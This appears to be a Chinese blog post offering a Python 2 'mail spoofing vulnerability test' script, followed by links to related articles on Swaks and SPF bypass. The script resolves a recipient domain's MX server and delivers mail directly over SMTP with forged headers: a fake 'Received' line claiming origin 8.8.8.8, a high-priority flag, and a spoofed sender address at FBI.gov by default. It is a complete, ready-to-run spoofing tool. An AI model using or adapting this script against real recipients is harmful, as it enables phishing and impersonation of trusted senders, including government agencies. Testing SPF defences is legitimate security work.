测试脚本:

# -*- coding: utf-8 -*-

import socket,select,base64,os,re,time,datetime

class mail:

    def __init__(self):

        self.errmsg = ''

    def send(self, buf):

        try:

            byteswritten = 0

            while byteswritten < len(buf):

                byteswritten += self.__sockfd.send(buf[byteswritten:])

        except:

            pass

    def recvline(self, strline):

        detect_fds = [self.__sockfd,]

        rrdy, wrdy, erdy = select.select(detect_fds, [], [], 20)

        if len(rrdy) == 0:

            return False

        else:

            while True:

                try:

                    strtmp = self.__sockfd.recv(1)

                    strline[0] += strtmp[0]

                    if(strtmp[0] == '\n'):

                        print 'server : '+strline[0]

                        break

                except:

                    return False

            return True

    def getresp(self, resp_str):

        while True:

            if(self.recvline(resp_str) == False):

                return False

            else:

                if resp_str[0][3] != '-':

                    break;

        return True

    def mailhelo(self, hostname):

        self.send('helo %s\r\n'%hostname)

        print 'host say: helo %s'%hostname

        resp_str = ['',]

        if(self.getresp(resp_str) == False):

            return False

        if resp_str[0][0:3] == '250':

            return True

        else:

            self.errmsg = resp_str[0]

            return False

    def mailfrom(self, fromstr):

        self.send('mail from: <%s>\r\n'%fromstr)

        print 'host say: mail from: <%s>'%fromstr

        resp_str = ['',]

        if(self.getresp(resp_str) == False):

            return False

        if resp_str[0][0:3] == '250':

            return True

        else:

            self.errmsg = resp_str[0]

            return False

    def mailto(self, tostr):

        self.send('rcpt to: <%s>\r\n'%tostr)

        print 'host say: rcpt to: <%s>'%tostr

        resp_str = ['',]

        if(self.getresp(resp_str) == False):

            return False

        if resp_str[0][0:3] == '250':

            return True

        else:

            self.errmsg = resp_str[0]

            return False

    def maildata(self):

        self.send('data\r\n')

        print 'host say: data'

        resp_str = ['',]

        if(self.getresp(resp_str) == False):

            return False

        if resp_str[0][0:3] == '354':

            return True

        else:

            self.errmsg = resp_str[0]

            return False

    def mailbody(self, bodystr):

        print 'host say: '+'.for <'+self.To+'>; '+time.strftime("%a, %d %b %Y %H:%M:%S +0800 (CST)",time.localtime())+'\r\n'

        print 'host say: '+'From: "=?GB2312?B?zfU=?=" <'+self.From+'>\r\n'

        print 'host say: '+'Subject:'+self.Subject+'?=\r\n'

        print 'host say: '+'To: <'+self.To+'>\r\n'

        print 'host say: '+bodystr

        self.send('Received: from ICE (unknown [8.8.8.8])\r\n')

        self.send('.by 8.8.8.8 (Coremail) with SMTP id _bJCALesoEAeAFMU.1\r\n')

        self.send('.for <'+self.To+'>; '+time.strftime("%a, %d %b %Y %H:%M:%S +0800 (CST)",time.localtime())+'\r\n')

        self.send('X-Originating-IP: [8.8.8.8]\r\n')

        self.send('Date: '+time.strftime("%a, %d %b %Y %H:%M:%S +0800",time.localtime())+'\r\n')

        self.send('From: '+self.FromName+ '<'+self.From+'>\r\n')

        self.send('Subject: '+self.Subject+'\r\n')

        self.send('To: <'+self.To+'>\r\n')

        self.send('X-Priority: 1\r\n')

        self.send('X-mailer: iceMail 1.0 [cn]\r\n')

        self.send('Mime-Version: 1.0\r\n')

        self.send('Content-Type: text/plain;\r\n')

        self.send('.charset="GB2312"\r\n')

        self.send('Content-Transfer-Encoding: quoted-printable\r\n\r\n')

        self.send(bodystr)

        self.send('\r\n.\r\n')

        resp_str = ['',]

        if(self.getresp(resp_str) == False):

            return False

        if resp_str[0][0:3] == '250':

            return True

        else:

            self.errmsg = resp_str[0]

            return False

    def mailquit(self):

        self.send('quit\r\n')

        print 'host say: quit'

        resp_str = ['',]

        if(self.getresp(resp_str) == False):

            return False

        if resp_str[0][0:3] == '221':

            print 'server : Bye'

            print 'mail send ok'

            return True

        else:

            self.errmsg = resp_str[0]

            return False

    def txmail(self, hostname, mailfrom, rcptto, bodystr):

        mx_server_list = []

        mail_postfix = re.split('@',rcptto)

        #print mail_postfix

        try:

            outstr = os.popen('nslookup -type=mx -timeout=10 %s'%mail_postfix[1], 'r').read()

        except Exception, e:

            print 'DEBUG: Execute nslookup:',e

            return False

        linestr = re.split('\n', outstr)

        for s in linestr:

            if re.match('.+[ |\t]mail exchanger[ |\t].+', s) != None:

                c = re.split(' |\t', s)

                mx_server_list.append(c[len(c) - 1])

        if len(mx_server_list) == 0:

            self.errmsg = 'Can not find MX server'

            return False

        for mx_element in mx_server_list:

            return_val = True

            mx_server_ip = socket.gethostbyname(mx_element)

            tx_sockfd = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP)

            try:

                tx_sockfd.connect((mx_server_ip, 25))

                self.__sockfd = tx_sockfd

                resp_str = ['',]

                self.getresp(resp_str)

                if self.mailhelo(hostname) and self.mailfrom(mailfrom) \

                     and self.mailto(rcptto) and self.maildata() and self.mailbody(bodystr) and self.mailquit():

                    pass

                else:

                    return_val = False

            except Exception, e:

                return_val = False

            try:

                tx_sockfd.close()

            except:

                pass

            if return_val == True:

                break

        return return_val

    def sendMail(self):

        self.StmpHost=self.From.split("@")[1]

        self.txmail(self.StmpHost, self.From, self.To, self.Data)

if __name__ == '__main__':

    icemail=mail()

    icemail.Port=25

    icemail.To='YourEmail@163.com'

    icemail.From='Info@FBI.gov'

    icemail.FromName='邮件伪造漏洞测试'

    icemail.Subject='邮件伪造漏洞测试'

    icemail.Data='邮件伪造漏洞测试'

    icemail.sendMail()

SPF邮件伪造漏洞测试脚本的更多相关文章

  1. Swaks绕过SPF验证进行邮件伪造

    0x00 swaks简介 Swaks是一个功能强大,灵活,可编写脚本,面向事务的SMTP测试工具,由John Jetmore编写和维护. 目前Swaks托管在私有svn存储库中.官方项目页面是http ...

  2. 邮件伪造测试-Swaks

    1. 前言 在kali中自带一个邮件伪造工具Swaks,工具项目主页为 http://jetmore.org/john/code/swaks 2.基本用法: swaks --to --from --e ...

  3. SPF难以解决邮件伪造的现状以及方案

    邮件伪造的现状 仿冒域名 私搭邮服仿冒域名: 例如某公司企业的域名是example.com,那么攻击者可以搭建一个邮服,也把自己的域名配置为example.com,然后发邮件给真实的企业员工xxx@e ...

  4. 编写自己的Acunetix WVS漏洞扫描脚本详细教程

    AWVS提供了自定义的脚本编程接口,可是网上的资料很少,只有官方的几篇介绍和参考手册,最近研究了一下怎么编写AWVS的漏洞脚本来写一篇简单性的文章 本文以8.0为例,首先呢安装好Acunetix We ...

  5. WordPress HMS Testimonials 多个跨站脚本漏洞和跨站请求伪造漏洞

    漏洞名称: WordPress HMS Testimonials 多个跨站脚本漏洞和跨站请求伪造漏洞 CNNVD编号: CNNVD-201308-199 发布时间: 2013-08-22 更新时间: ...

  6. WordPress A Forms插件HTML注入漏洞和跨站请求伪造漏洞

    漏洞名称: WordPress A Forms插件HTML注入漏洞和跨站请求伪造漏洞 CNNVD编号: CNNVD-201308-281 发布时间: 2013-08-20 更新时间: 2013-08- ...

  7. 点击劫持漏洞之理解 python打造一个挖掘点击劫持漏洞的脚本

    前言: 放假了,上个星期刚刚学习完点击劫持漏洞.没来的及写笔记,今天放学总结了一下 并写了一个检测点击劫持的脚本.点击劫持脚本说一下哈.= =原本是打算把网站源码 中的js也爬出来将一些防御的代码匹配 ...

  8. CSRF 漏洞测试

    CSRF简介: CSRF中文名:跨站请求伪造,英文译为:Cross-site request forgery,CSRF攻击就是attacker(攻击者)利用victim(受害者)尚未失效的身份认证信息 ...

  9. JMeter http(s)测试脚本录制器的使用

    JMeter http(s)测试脚本录制器的使用 by:授客 QQ:1033553122 http(s) Test Script Recorder允许Jmeter在你使用普通浏览器浏览web应用时,拦 ...

随机推荐

  1. jQuery 2.0.3 源码分析core - 整体架构

    拜读一个开源框架,最想学到的就是设计的思想和实现的技巧. 废话不多说,jquery这么多年了分析都写烂了,老早以前就拜读过, 不过这几年都是做移动端,一直御用zepto, 最近抽出点时间把jquery ...

  2. centos6.5 下搭建lamp环境

    一直以为很麻烦,实际操作起来并没有遇到什么问题,yum源是163,php版本是5.3(有点老,以后再更新吧):详细步骤如下: 第一步:安装php mysql apache yum -y install ...

  3. 深入理解DOM事件类型系列第四篇——剪贴板事件

    × 目录 [1]定义 [2]对象方法 [3]应用 前面的话 剪贴板操作可能看起来不起眼,但是却十分有用,可以增强用户体验,方便用户操作.本文将详细介绍剪贴板事件 定义 剪贴板操作包括剪切(cut).复 ...

  4. 【原生态】Http请求数据 与 发送数据

    今天项目组小弟居然问我怎么用java访问特定的地址获取数据和发送请求 Http请求都是通过输入输出流来进行操作的,首先要制定GET或者POST,默认是GET,在安全和数据量较大情况下请使用post 根 ...

  5. ASP.NET通过递归添加树(Treeview)

    先来看看效果,基本上就是这样的. 所谓树,无非就是2点,第一个:根节点,第二:叶子节点,其中叶子节点中还可能有叶子节点,但是根节点始终只有一个. 下面贴上 各部分的代码 1.PAGE_LOAD载入事件 ...

  6. Handler类、异步线程和Message类的参数传递

    声明HandlerThread对象,实现了使用Looper来处理消息队列的功能 //这个类由Android操作系统提供 HandlerThread handlerThread = new Handle ...

  7. c#和Javascript中去重总结

    一.前言 去重在我们的开发过程中经常遇到,避免重复元素的添加,我们需要对获取到的集合(包括List.Array等) 做相关的过滤操作.确保对象的唯一性,从而达到保证数据不冗余重复.由于自己是做.net ...

  8. 搭建OpenGL环境-Windows/VS2013

    对于opengl的环境,简单搭建的话其实和opencv差不多,你会看到下面的过程与opencv类似,不同的就是某些文件需要自己找(因为不是集成的,各个拓展需要单独下载) 1.首先,对于opengl头文 ...

  9. JS实现带复选框的下拉菜单

    这段时间在做后台的时候需要一个可以复选的下拉菜单,用到的是easyUI中的combo的Demo,先看看官方easyUI:http://www.jeasyui.com/documentation/ind ...

  10. rem、em、px的区别

    px 像素(Pixel).相对长度单位.像素px是相对于显示器屏幕分辨率而言的. 特点: 1. IE无法调整那些使用px作为单位的字体大小: 2. 国外的大部分网站能够调整的原因在于其使用了em或re ...